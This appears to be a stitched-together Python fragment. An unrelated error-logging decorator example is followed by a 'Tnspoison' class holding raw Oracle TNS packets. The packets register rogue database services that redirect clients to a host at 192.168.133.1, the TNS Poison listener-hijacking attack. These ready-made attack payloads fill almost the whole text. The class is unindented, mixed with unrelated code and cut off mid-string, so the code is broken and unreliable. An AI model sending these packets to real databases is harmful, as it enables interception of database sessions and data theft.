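# (hypothetical example class; assumes qf_logger is configured as used above):
@ErrorHandling.class_error_logging()
class FlakyLoader:
    def load(self):
        raise IOError('feed unavailable')

FlakyLoader().load()  # logs the traceback and returns None instead of raising
print(ErrorHandling.get_error_messages())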
class Tnspoison(Tnscmd):
PACKET_REGISTER = b'\x00h\x00\x00\x01\x00\x00\x00\x019\x01,\x00\x81\x08\x00\x7f\xff\x7f\x08\x00\x00\x01\x00\x00.\x00:\x00\x00\x07\xf8\x0c\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(CONNECT_DATA=(COMMAND=service_register_NSGR))'
PACKET_TNSPOISON_SID_2 = b'\x05~\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x05t$\x08\xff\x03\x01\x00\x1244xx4x\x10\x102\x102\x102Tv\x102\x102Tv\x00x\x102Tv\x00\x00H\x00\x00\x80\x02\x00\x00\x00\x00\x04\x00\x00\xc0\xe9F\x0b\x00\x00\x00\x00\x90\x00#\x00\x00\x00BEC76C2CC136-5F9F-E034-0003BA1374B3\x03\x00e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\xfc\x04\x00\x80\x05\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x80\xf5-\x0b\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xb0\x00N\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc8\xa8E\x0b\x00\x00\x00\x00\xf9&\xe6!\x8b\x80Nj\xbd\x8dwi\xbfN;S\x03\x00\x00\x00\x00\x00\x00\x00\xe0E\xac%\xff\x07\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x88\x02N\x0b\x00\x00\x00\x00\n\x00\x00\x00d\x00\x00\x00\x01\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00h\xf5-\x0b\x00\x00\x00\x00or\x00(HOST=192.168.133.1 )\x00\x01\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00x\xa9\xff\x1f\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00P\xa9\xff\x1f\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00X\xa7E\x0b\x00\x00\x00\x00orXDB\x00\x06\x00\x00\x00\x00\x00\x00\x00x\xa9\xff\x1f\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fE\x0b\x00\x00\x00\x00orXDB\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xc8\xd9\xa8%\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xa0\xd9\xa8%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xa6E\x0b\x00\x00\x00\x00or\x00\x03\x00\x00\x00\x00\x00\x00\x00\xc8\xd9\xa8%\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc-\x0b\x00\x00\x00\x00or\x00\x01\x00\x00\x00E\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xf0\x80\x85%\xff\x07\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00PfN\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\xa9E\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00E\x00\x00\x00\x00\x00\x00\x00\xf0\x80\x85%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\xa5E\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xb8\x97E\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90fN\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\xa8E\x0b\x00\x00\x00\x00\\xacG2\\xe3f\xc7Lt\xc2\x05\x00\x00\x00\x00\x00\x00\x00`Z\xf6!\xff\x07\x00\x00;\x00\x00\x00\x00\x00\x00\x00\xe0\x91\x94%\xff\x07\x00\x001\x00\x00\x00\x00\x00\x00\x00\xfcfN\x0b\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x03\x00\x00\x04\x10\x00\x00\x01\x00\x00\x00\xc8X\xea\x1f\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x97E\x0b\x00\x00\x00\x00D000\x00(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.133.1 )(PORT=49180))\x00DISPATCHER <machine: 192.168.133.1 , pid: 2316>\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xd0\xfb-\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90\x99-\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc2{FlM\x1eC\xb9\x90\x89\x11\x1dT\x91\x08}P\xa9\xff\x1f\xff\x07\x00\x00\n\x00\x00\x00\x00\x00\x00\x00,T{G\x01\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00\x88E\xac%\xff\x07\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\xf0y{G\x01\x00\x00\x00\x05\x00\x00\x00\x95\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\xe8\xd9\xa8%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\xfb-\x0b\x00\x00\x00\x00DEDICATED\x00(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.133.1 )(PORT=9999))\x00REMOTE SERVER\x00\x06\x00\x00\x00\x00\x00\x00\x00x\xa9\xff\x1f\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fE\x0b\x00\x00\x00\x00orXDB\x00\xa0\xd9\xa8%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\xc8\xd9\xa8%\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc-\x0b\x00\x00\x00\x00or\x00\x00\x00'
PACKET_TNSPOISON_SID_3 = b'\x05\x86\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x05|$\x08\xff\x03\x01\x00\x1244xx4x\x10\x102\x102\x102Tv\x102\x102Tv\x00x\x102Tv\x00\x00H\x00\x00\x80\x02\x00\x00\x00\x00\x04\x00\x00\xc0\xe9?\x0b\x00\x00\x00\x00\x90\x00#\x00\x00\x00BEC76C2CC136-5F9F-E034-0003BA1374B3\x03\x00e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x04\x05\x00\x80\x05\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x80\xf5\xdc\n\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xb0\x00I\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc8\xa8>\x0b\x00\x00\x00\x00\xbc\x1d\xb3C{\xa0O\xcc\x88\xb6\xc5\xeb\xf6b\xe2g\x04\x00\x00\x00\x00\x00\x00\x00\xe0E\xac%\xff\x07\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x88\x02I\x0b\x00\x00\x00\x00\n\x00\x00\x00d\x00\x00\x00\x01\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00h\xf5\xdc\n\x00\x00\x00\x00orc\x00(HOST=192.168.133.1 )\x00\x01\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00x\xa9\xff\x1f\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00P\xa9\xff\x1f\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00X\xa7>\x0b\x00\x00\x00\x00orcXDB\x00\x07\x00\x00\x00\x00\x00\x00\x00x\xa9\xff\x1f\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8f>\x0b\x00\x00\x00\x00orcXDB\x00\x01\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00H\xcf\xaa%\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00 \xcf\xaa%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xa6>\x0b\x00\x00\x00\x00orc\x00\x04\x00\x00\x00\x00\x00\x00\x00H\xcf\xaa%\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc\xdc\n\x00\x00\x00\x00orc\x00\x01\x00\x00\x00E\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xe8j\xf1\x1f\xff\x07\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00PfI\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\xa9>\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00E\x00\x00\x00\x00\x00\x00\x00\xe8j\xf1\x1f\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\xa5>\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xb8\x97>\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90fI\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\xa8>\x0b\x00\x00\x00\x002\xb6\xccUu\xebH\xdf\x90\x97\x1ct\xdc\x03\xa1\x8c\x05\x00\x00\x00\x00\x00\x00\x00`Z\xf6!\xff\x07\x00\x00;\x00\x00\x00\x00\x00\x00\x00\xe0\x91\x94%\xff\x07\x00\x001\x00\x00\x00\x00\x00\x00\x00\xfcfI\x0b\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x03\x00\x00\x04\x10\x00\x00\x01\x00\x00\x00\xc8\xaf\xea\x1f\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x97>\x0b\x00\x00\x00\x00D000\x00(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.133.1 )(PORT=49184))\x00DISPATCHER <machine: 192.168.133.1 , pid: 2936>\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xd0\xfb\xdc\n\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90\x99\xdc\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00&\xe1A\xbfx\xe6B\xa6\xab\xcd\xdd\xef\xc9\xe1\xffrP\xa9\xff\x1f\xff\x07\x00\x00\n\x00\x00\x00\x00\x00\x00\x00,T{G\x01\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00\x88E\xac%\xff\x07\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\xf0y{G\x01\x00\x00\x00\x03\x00\x00\x00\x95\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00h\xcf\xaa%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\xfb\xdc\n\x00\x00\x00\x00DEDICATED\x00(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.133.1 )(PORT=9999))\x00REMOTE SERVER\x00\x07\x00\x00\x00\x00\x00\x00\x00x\xa9\xff\x1f\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8f>\x0b\x00\x00\x00\x00orcXDB\x00 \xcf\xaa%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00H\xcf\xaa%\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc\xdc\n\x00\x00\x00\x00orc\x00\x00\x00\x00'
PACKET_TNSPOISON_SID_4 = b'\x05\x8a\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x05\x80$\x08\xff\x03\x01\x00\x1244xx4x\x10\x102\x102\x102Tv\x102\x102Tv\x00x\x102Tv\x00\x00H\x00\x00\x80\x02\x00\x00\x00\x00\x04\x00\x00(\xe9F\x0b\x00\x00\x00\x00\x90\x00#\x00\x00\x00BEC76C2CC136-5F9F-E034-0003BA1374B3\x03\x00e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x08\x05\x00\x80\x05\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x80\xf5)\x0b\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xb0\x00N\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\xa8E\x0b\x00\x00\x00\x00\xe8\xfaB(\xc9\xb7D4\xa1F\xa9\xdcR\xce\xa7\x82\x05\x00\x00\x00\x00\x00\x00\x00\xd8E\xec\x1a\xff\x07\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x88\x02N\x0b\x00\x00\x00\x00\n\x00\x00\x00d\x00\x00\x00\x01\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00h\xf5)\x0b\x00\x00\x00\x00orcl\x00(HOST=192.168.133.1 )\x00\x01\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x90tt\x15\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00htt\x15\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa6E\x0b\x00\x00\x00\x00orclXDB\x00\x08\x00\x00\x00\x00\x00\x00\x00\x90tt\x15\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fE\x0b\x00\x00\x00\x00orclXDB\x00\x01\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xc0\xd9\xe8\x1a\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x98\xd9\xe8\x1a\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xa6E\x0b\x00\x00\x00\x00orcl\x00\x05\x00\x00\x00\x00\x00\x00\x00\xc0\xd9\xe8\x1a\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc)\x0b\x00\x00\x00\x00orcl\x00\x01\x00\x00\x00E\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x10\x1ax\x15\xff\x07\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00PfN\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe8\xa8E\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00E\x00\x00\x00\x00\x00\x00\x00\x10\x1ax\x15\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00H\xa5E\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xd8\x9eE\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90fN\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\xa7E\x0b\x00\x00\x00\x00\xc2#\x0b\x17=\xd6G\x9a\xbe\xd1\xea\xbd\xa2mss\x05\x00\x00\x00\x00\x00\x00\x00`\xaaq\x17\xff\x07\x00\x00;\x00\x00\x00\x00\x00\x00\x00\xd8\x91\xd4\x1a\xff\x07\x00\x001\x00\x00\x00\x00\x00\x00\x00\xfcfN\x0b\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x03\x00\x00\x04\x10\x00\x00\x01\x00\x00\x008\xebh\x15\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x9eE\x0b\x00\x00\x00\x00D000\x00(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.133.1 )(PORT=49188))\x00DISPATCHER <machine: 192.168.133.1 , pid: 3032>\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xd0\xfb)\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90\x99)\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x002\xd4`M\xd6%N]\x9a\xbe\xc9H\xe2\x16\xdfNhtt\x15\xff\x07\x00\x00\n\x00\x00\x00\x00\x00\x00\x00,T{G\x01\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00\x80E\xec\x1a\xff\x07\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\xf0y{G\x01\x00\x00\x00\x05\x00\x00\x00\x95\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\xe0\xd9\xe8\x1a\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\xfb)\x0b\x00\x00\x00\x00DEDICATED\x00(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.133.1 )(PORT=9999))\x00REMOTE SERVER\x00\x08\x00\x00\x00\x00\x00\x00\x00\x90tt\x15\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fE\x0b\x00\x00\x00\x00orclXDB\x00\x98\xd9\xe8\x1a\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\xc0\xd9\xe8\x1a\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc)\x0b\x00\x00\x00\x00orcl\x00'
PACKET_TNSPOISON_SID_5 = b'\x05\x92\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x05\x88$\x08\xff\x03\x01\x00\x1244xx4x\x10\x102\x102\x102Tv\x102\x102Tv\x00x\x102Tv\x00\x00H\x00\x00\x80\x02\x00\x00\x00\x00\x04\x00\x00\xc0\xe9G\x0b\x00\x00\x00\x00\x90\x00#\x00\x00\x00BEC76C2CC136-5F9F-E034-0003BA1374B3\x03\x00e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x10\x05\x00\x80\x05\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x80\xf5\xdc\n\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xb0\x00B\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc8\xa8F\x0b\x00\x00\x00\x00\xde&\xd5\x89\xc2\xb5K\xbf\x9f\x9c\x8f\x1c\xad\xe3X\xe4\x06\x00\x00\x00\x00\x00\x00\x00\xd0El2\xff\x07\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x88\x02B\x0b\x00\x00\x00\x00\n\x00\x00\x00d\x00\x00\x00\x01\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00h\xf5\xdc\n\x00\x00\x00\x00orcl1\x00(HOST=192.168.133.1 )\x00\x01\x00\x00\x00\t\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xc0\x81\xbf,\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x98\x81\xbf,\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00X\xa7F\x0b\x00\x00\x00\x00orcl1XDB\x00\t\x00\x00\x00\x00\x00\x00\x00\xc0\x81\xbf,\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fF\x0b\x00\x00\x00\x00orcl1XDB\x00\x01\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00x\xd4i2\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00P\xd4i2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xa6F\x0b\x00\x00\x00\x00orcl1\x00\x06\x00\x00\x00\x00\x00\x00\x00x\xd4i2\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc\xdc\n\x00\x00\x00\x00orcl1\x00\x01\x00\x00\x00E\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xe0\x80E2\xff\x07\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00PfB\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\xa9F\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00E\x00\x00\x00\x00\x00\x00\x00\xe0\x80E2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\xa5F\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xb8\x97F\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90fB\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\xa8F\x0b\x00\x00\x00\x00\xa2n\x97\xfb\n4La\xb1*H/t\xe3G?\x05\x00\x00\x00\x00\x00\x00\x00`*_.\xff\x07\x00\x00;\x00\x00\x00\x00\x00\x00\x00\xd0\x91T2\xff\x07\x00\x001\x00\x00\x00\x00\x00\x00\x00\xfcfB\x0b\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x03\x00\x00\x04\x10\x00\x00\x01\x00\x00\x00h\x81\xbf,\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x97F\x0b\x00\x00\x00\x00D000\x00(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.133.1 )(PORT=49192))\x00DISPATCHER <machine: 192.168.133.1 , pid: 1716>\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xd0\xfb\xdc\n\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90\x99\xdc\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x89\\x80\x83K\xdd\xbc+\xc5F\x15\x83M\xef\x98\x81\xbf,\xff\x07\x00\x00\n\x00\x00\x00\x00\x00\x00\x00,T{G\x01\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00xEl2\xff\x07\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\xf0y{G\x01\x00\x00\x00\x04\x00\x00\x00\x95\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x98\xd4i2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\xfb\xdc\n\x00\x00\x00\x00DEDICATED\x00(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.133.1 )(PORT=9999))\x00REMOTE SERVER\x00\t\x00\x00\x00\x00\x00\x00\x00\xc0\x81\xbf,\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fF\x0b\x00\x00\x00\x00orcl1XDB\x00P\xd4i2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00x\xd4i2\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc\xdc\n\x00\x00\x00\x00orcl1\x00\x00'
PACKET_TNSPOISON_SID_6 = b'\x05\x9a\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x05\x90$\x08\xff\x03\x01\x00\x1244xx4x\x10\x102\x102\x102Tv\x102\x102Tv\x00x\x102Tv\x00\x00H\x00\x00\x80\x02\x00\x00\x00\x00\x04\x00\\xeaB\x0b\x00\x00\x00\x00\x90\x00#\x00\x00\x00BEC76C2CC136-5F9F-E034-0003BA1374B3\x03\x00e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x18\x05\x00\x80\x05\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x80\xf5-\x0b\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xb0\x00M\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x88\xa9A\x0b\x00\x00\x00\x00\x8c$ez\xe2\xdfN\xb6\xa6\xff\x84S\xc2<k\x05\x07\x00\x00\x00\x00\x00\x00\x00\xd0El2\xff\x07\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x88\x02M\x0b\x00\x00\x00\x00\n\x00\x00\x00d\x00\x00\x00\x01\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00h\xf5-\x0b\x00\x00\x00\x00orcl12\x00(HOST=192.168.133.1 )\x00\x01\x00\x00\x00\n\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00`)D2\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x008)D2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\xa8A\x0b\x00\x00\x00\x00orcl12XDB\x00\n\x00\x00\x00\x00\x00\x00\x00`)D2\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fA\x0b\x00\x00\x00\x00orcl12XDB\x00\x01\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x008\xcfj2\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x10\xcfj2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`\xa7A\x0b\x00\x00\x00\x00orcl12\x00\x07\x00\x00\x00\x00\x00\x00\x008\xcfj2\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc-\x0b\x00\x00\x00\x00orcl12\x00\x01\x00\x00\x00E\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00(\x94\xba,\xff\x07\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00PfM\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\xaaA\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00E\x00\x00\x00\x00\x00\x00\x00(\x94\xba,\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xa6A\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xb8\x97A\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90fM\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\xa8A\x0b\x00\x00\x00\x00B6w~\x80\tK^\x83\xafF\xdaE\xbeu\xe9\x05\x00\x00\x00\x00\x00\x00\x00`*_.\xff\x07\x00\x00;\x00\